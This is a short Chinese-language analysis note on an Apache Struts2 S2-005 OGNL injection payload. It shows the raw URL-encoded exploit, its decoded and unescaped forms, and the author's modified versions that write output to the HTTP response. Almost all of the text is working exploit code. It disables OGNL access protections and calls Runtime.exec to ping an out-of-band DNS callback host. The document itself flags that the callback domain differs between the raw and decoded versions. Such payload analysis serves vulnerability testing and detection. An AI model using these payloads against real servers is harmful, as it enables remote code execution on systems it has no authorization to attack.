S2-005 payload 分析
原始 payload
(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))
&(asdf)(('%5cu0023rt.exec(%22ping@-c@3@ijtrsivzwnreezte.send.jiance.qianxin.com%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1
URLDecode 后（注意：此处解码结果中的回连域名与上方原始 payload 中的域名并不一致）
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&(aaaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023vccc')(\u0023vccc\u003dnew java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
Unicode 转义还原后（\u0023 → #，\u003d → =）
('#_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&
(aaaa)(
('#context[\'xwork.MethodAccessor.denyMethodExecution\']=#vccc')
(#vccc=new java.lang.Boolean("false"))
)&
(asdf)(
('#rt.exec("ping@-c@3@ijtrsivzwnreezte.dnslog.com".split("@"))')
(#rt=@java.lang.Runtime@getRuntime())
)=1
开始修改
('\u0023_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true&
(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&
(aabb)(
('#outstr.close()')
('#outstr.print("888888")')
('#outstr.println("webpath")')
('#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()')
)
修改状态2
(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(aabb)(('\u0023outstr.close()')('\u0023outstr.print("888888")')('\u0023outstr.println("webpath")')('\u0023outstr\u003d@org.apache.struts2.ServletActionContext@getResponse().getWriter()'))=1